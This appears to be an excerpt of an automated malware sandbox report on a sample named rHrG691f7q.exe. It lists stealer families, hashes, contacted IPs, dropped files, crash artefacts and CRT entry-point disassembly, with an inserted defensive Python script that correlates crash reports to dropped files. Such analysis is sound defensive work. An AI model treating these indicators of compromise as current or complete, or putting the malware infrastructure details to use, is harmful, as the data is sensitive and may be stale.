CLOUDFLARENETUS | setup.msi                     | malicious | Unknown                        | 104.21.58.24
CLOUDFLARENETUS | TN78WX7nJU.exe                | malicious | LummaC                         | 104.21.96.1
CLOUDFLARENETUS | XIaCqh1vRm.exe                | malicious | LummaC                         | 104.21.56.70
CLOUDFLARENETUS | PqCznDthHP.exe                | malicious | Edge Stealer                   | 104.26.13.205
CLOUDFLARENETUS | PO_0099822111ORDER.js         | malicious | Remcos                         | 104.21.84.67
CLOUDFLARENETUS | QQx0tdFC0b.exe                | malicious | LummaC                         | 104.21.56.70
CLOUDFLARENETUS | HIDE0RerES.exe                | malicious | LummaC                         | 172.67.207.38
CLOUDFLARENETUS | Dqw8QFydEX.exe                | malicious | LummaC                         | 104.21.112.1
                                                                                                                                                                                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                                                      order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 104.21.90.137
                                                                                                                                                                                                                                                      CLOUDFLARENETUSTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                                                      order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 104.21.90.137
                                                                                                                                                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 172.67.177.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | TN78WX7nJU.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | XIaCqh1vRm.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | QQx0tdFC0b.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | HIDE0RerES.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | Dqw8QFydEX.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | malicious | LummaC | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC Stealer | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 23.55.153.106, 104.21.22.222, 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 23.55.153.106, 104.21.22.222, 104.21.96.1
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | TN78WX7nJU.exe | malicious | LummaC | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | XIaCqh1vRm.exe | malicious | LummaC | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | PO_0099822111ORDER.js | malicious | Remcos | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | QQx0tdFC0b.exe | malicious | LummaC | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | 7VfKPMdmiX.exe | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | 7VfKPMdmiX.exe | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Setup.msi | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.56.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | TN78WX7nJU.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | XIaCqh1vRm.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe | QQx0tdFC0b.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | TN78WX7nJU.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | XIaCqh1vRm.exe | malicious | LummaC |
C:\Users\user\AppData\Local\Temp\1A68.tmp.exe | QQx0tdFC0b.exe | malicious | LummaC |
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9580075629932736
Encrypted: false
SSDEEP: 192:bHspIK+TM0Qp+sVTaju3RzuiF6Z24IO85:jlKqQp+sVGjgzuiF6Y4IO85
MD5: 3D8E498D9252BA073A094CE27FCEBAF8
SHA1: 8C2C9594026B1745BD5E92D286DA890DBEE62F52
SHA-256: A5FB892DE193AD0EDAC75E3516806032E308A8272DAF7D0D729BF983C61F2D58
SHA-512: 89EDE077A04D7679F8F2E663380E0A678ACFB950A3711ED1F95CE38B1EE7161881DE354532189404288836F271DF642F411DE629D2E24030EF646022EA9ABD16
Malicious: true
Reputation: low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.7.9.5.0.3.6.6.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.7.9.5.4.7.4.1.1.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.2.2.b.5.5.8.-.2.6.5.0.-.4.d.3.e.-.a.f.d.4.-.5.e.a.a.c.e.b.9.4.2.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.5.7.3.9.7.0.-.e.6.e.c.-.4.7.3.f.-.a.4.a.c.-.e.c.8.e.3.b.b.7.b.d.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.A.6.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.a.4.-.0.0.0.1.-.0.0.1.5.-.8.1.2.2.-.3.7.5.e.2.a.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.8.8.a.0.8.5.1.0.0.5.8.e.4.0.8.f.4.2.c.5.5.c.2.8.d.d.2.3.c.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.1.A.6.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Dec 14 13:16:35 2024, 0x1205a4 type
Category: dropped
                                                                                                                                                                                                                                                                  Size (bytes):46254
                                                                                                                                                                                                                                                                  Entropy (8bit):2.566770614452791
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:Tr5cicXqOjThpOx1BxRWcQ3X6Xq22VFYCiNVkfPhUK2VBrfAfm:mDjmTBxRWn3XRk38fJV2VB7Mm
                                                                                                                                                                                                                                                                  MD5:74151FA95799E7EF6D68B97C6D6EDE80
                                                                                                                                                                                                                                                                  SHA1:A6F2A3BA5174A96553A71DB48B551E3E64F5F624
                                                                                                                                                                                                                                                                  SHA-256:74A6A714299EF16FA8A1DB5A95AB99B630647137F9E93CEBD1CC7AC0D6A1A4C1
                                                                                                                                                                                                                                                                  SHA-512:8211FDDEA43AFB0D0EA3D028D8C30EB7A6D16788E9A3F5C9DF3E7C429106DD86DFDA4A076D27005DA0EC808885283327CB846B9826F469B1B6685F82A9759AF6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .......3.]g............4...............H...........<...........|-..........`.......8...........T...........8A..vs......................................................................................................eJ......t ......GenuineIntel............T...........%.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8286
                                                                                                                                                                                                                                                                  Entropy (8bit):3.6975879314903284
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJPO6V6YaH6SgmfOrs+Y0pDy89bjhsfEhm:R6lXJG6V6YC6SgmfDujafP
                                                                                                                                                                                                                                                                  MD5:7D502E508676EFD9ED3F6ACA8B75469D
                                                                                                                                                                                                                                                                  SHA1:9648B471F5713EDC795808CB42931511021834DF
                                                                                                                                                                                                                                                                  SHA-256:56C191994670D2549893FFAE46605BF4B602A7F5A68177CF0AD3B684227E090D
                                                                                                                                                                                                                                                                  SHA-512:F0162CE7954196E337F417E28D3A767919BAB742DE95B6C3C8092F0D152875B0C87FD0B9AA853E4C8C7BDC3A03933C5B3BAD9DEBED00DBCA7CC69DBAAEDCE82F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.4.4.<./.P.i.
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4565
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4439637104311425
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs6Jg77aI9cHWpW8VY2Ym8M4J2CH9TXeFY+q8frrNCkcX6QzQ2dd:uIjfII7K27VmJNGcX6QzQ2dd
                                                                                                                                                                                                                                                                  MD5:349FDD6E1B27929EF886B0BA2A6B1FDD
                                                                                                                                                                                                                                                                  SHA1:D58FBC22C711D064A65B14BAC1F7C5D9750DF111
                                                                                                                                                                                                                                                                  SHA-256:A4EEC856517F4868F5324B1B8C5830AD05072AC6F6E72DF48F9D84636F98A0B6
                                                                                                                                                                                                                                                                  SHA-512:F5AF87A1B423F1A0B4D798CB902E1F78A19F70EE3F214792C47CAB9E6235DE9211BEA4728214251322F88652ECCC9A6FD3E70554F011054246F6E0276B6C14CF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630979" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):361984
                                                                                                                                                                                                                                                                  Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                  MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                  SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                  SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                  SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):361984
                                                                                                                                                                                                                                                                  Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                  MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                  SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                  SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                  SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
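Added example (not part of the Joe Sandbox report): the WER artifacts above can be tied back to the dropped PE32 without the sandbox UI. Report.wer is UTF-16LE key=value text whose TargetAppId field carries the SHA1 of the crashed image after the "!0000" separator, and that SHA1 (4A2095690BA8F1325DD10167318728447D12058A) is the one listed for the file dropped by rHrG691f7q.exe. The script below parses a Report.wer constructed from the fields visible in the preview, pulls that SHA1 out, matches it against a dropped-file inventory built from the table, recognises the "MDMP" minidump magic, and computes the 8-bit Shannon entropy that the "Entropy (8bit)" column reports. The inventory dict, the regex and all function names are this example's own assumptions.

```python
"""Correlate a WER Report.wer with a sandbox's dropped-file inventory.

Added example; not code from the Joe Sandbox report.  Assumptions:
TargetAppId has the form  W:<app-id-hex>!0000<sha1-of-crashed-image>!<image-name>
(as seen in the report preview), and the inventory below is keyed by SHA1.
"""
import math
import re

# Constructed Report.wer, UTF-16LE with BOM, using only fields from the preview.
SAMPLE_REPORT_WER = (
    "\ufeff"
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "NsAppName=1A68.tmp.exe\r\n"
    "TargetAppId=W:0006c388a08510058e408f42c55c28dd23c80000ffff!"
    "00004a2095690ba8f1325dd10167318728447d12058a!1A68.tmp.exe\r\n"
).encode("utf-16-le")

# SHA1 values copied from the dropped-file table above (assumed inventory format).
DROPPED_FILES = {
    "4A2095690BA8F1325DD10167318728447D12058A": "PE32 dropped by rHrG691f7q.exe, 361984 bytes",
    "A6F2A3BA5174A96553A71DB48B551E3E64F5F624": "minidump written by WerFault.exe, 46254 bytes",
}

# Hypothetical pattern for TargetAppId: app-id hex, "!0000", 40-hex SHA1, "!", image name.
TARGET_APP_ID_RE = re.compile(r"^W:[0-9a-fA-F]+!0000([0-9a-fA-F]{40})!(.+)$")


def parse_report_wer(data: bytes) -> dict:
    """Decode a UTF-16LE Report.wer and return its key=value pairs."""
    text = data.decode("utf-16-le").lstrip("\ufeff")
    fields = {}
    for line in text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def crashed_image_sha1(fields: dict):
    """Return (SHA1 upper-case, image name) from TargetAppId, or None if absent."""
    m = TARGET_APP_ID_RE.match(fields.get("TargetAppId", ""))
    if not m:
        return None
    return m.group(1).upper(), m.group(2)


def correlate(report: bytes, inventory: dict):
    """Map a Report.wer to the dropped file whose SHA1 matches the crashed image."""
    fields = parse_report_wer(report)
    hit = crashed_image_sha1(fields)
    if hit is None:
        return None
    sha1, image = hit
    return {
        "event": fields.get("EventType"),
        "image": image,
        "sha1": sha1,
        "dropped_file": inventory.get(sha1),  # None if the crashed image was not dropped
    }


def is_minidump(data: bytes) -> bool:
    """Minidump files start with the ASCII signature 'MDMP' (see the preview above)."""
    return data[:4] == b"MDMP"


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


if __name__ == "__main__":
    print(correlate(SAMPLE_REPORT_WER, DROPPED_FILES))
    print(is_minidump(b"MDMP\x93\xa7\x00\x00"), entropy_8bit(bytes(range(256))))
```

Run against a real sandbox export, read each Report.wer from disk and feed the dropped-file table's SHA1 column as the inventory; a crashed image whose SHA1 is absent from the inventory is worth a second look, because it means the binary that crashed was never captured as a dropped file.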
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                  Entropy (8bit):4.468584472694627
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:BzZfpi6ceLPx9skLmb0flZWSP3aJG8nAgeiJRMMhA2zX4WABluuNBjDH5S:ZZHtlZWOKnMM6bFpnj4
                                                                                                                                                                                                                                                                  MD5:AD2B3E929D6903DC7F23D646E35AD6D4
                                                                                                                                                                                                                                                                  SHA1:3A2E48437D4AB245494A03D1984FD954A113E5AB
                                                                                                                                                                                                                                                                  SHA-256:17D04DF93CAF4D74369CA51318EB06655B77C8CDFFDDACF5FC6C3EF880A1DDF5
                                                                                                                                                                                                                                                                  SHA-512:51CD0749F7F3E226B346A72537873766051CE032946EFF2A71FB8E87F35EFD876BB0864F74C86A3E386FBAE541408FC89CDF9243CB293777D481A112FCDA1002
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Jf*N..............................................................................................................................................................................................................................................................................................................................................*,\R........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):6.965102901294979
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:rHrG691f7q.exe
                                                                                                                                                                                                                                                                  File size:429'056 bytes
                                                                                                                                                                                                                                                                  MD5:f610013d7c84f779afa017218890e7ce
                                                                                                                                                                                                                                                                  SHA1:b804e0105708cc52b09137bfd2b76c5515577e3a
                                                                                                                                                                                                                                                                  SHA256:69b0f2ca7e883e86bc905febffef4e074ef837451faa9e88dbba74fda64319a1
                                                                                                                                                                                                                                                                  SHA512:50f16d2dcf69221f2b91a66312d7363e7a8ac55da7791bf7549dddb2271a5a3a0c43bdc29e629cfebc2a306b0a310fb9be2eeb5612dda020328b92699c6f05bb
                                                                                                                                                                                                                                                                  SSDEEP:6144:aa23ghN4DGiskOK96qetIDoCC9aYHYZemInIeR0wWku:aa2ghWGisu96qe3bHYZemiR0w
                                                                                                                                                                                                                                                                  TLSH:7B94D013A2F1B921E6B34F325D3DF7D86A2FF5624E34662E22545A5F09702A1C673B03
                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L...\A.e...........
                                                                                                                                                                                                                                                                  Icon Hash:46c7c30b0f4e0d19
                                                                                                                                                                                                                                                                  Entrypoint:0x40185c
                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x65D1415C [Sat Feb 17 23:29:32 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:28289f2f7e0a533d999708a3ae088e0b
Entry point disassembly (0x40185c):
The entry stub is a call followed by a jmp into the CRT startup code; the instructions listed after it are the MSVC CRT's __report_gsfailure routine, not sample-specific code. It saves every general-purpose and segment register into a global CONTEXT record (ContextFlags 0x10001 = CONTEXT_CONTROL), fills an EXCEPTION_RECORD with ExceptionCode 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) and ExceptionFlags 1 (EXCEPTION_NONCONTINUABLE), and loads __security_cookie and its complement from 0x454004/0x454008 before calling out through the import table. This matches the VS2008 toolchain identified below.
call 00007EFF39096896h
jmp 00007EFF39092F1Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
